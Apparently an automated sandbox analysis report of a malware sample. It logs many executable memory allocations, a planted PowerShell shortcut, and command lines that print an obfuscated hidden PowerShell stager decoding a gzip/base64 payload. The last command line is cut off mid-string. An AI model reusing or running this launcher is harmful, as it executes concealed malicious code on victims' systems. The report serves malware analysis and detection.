NtProtectVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02851000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02852000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0221a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02212000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0221c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02213000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02214000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02215000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02216000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02217000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02218000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02219000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029de000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029df000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0ANQBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
cmdline	"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbu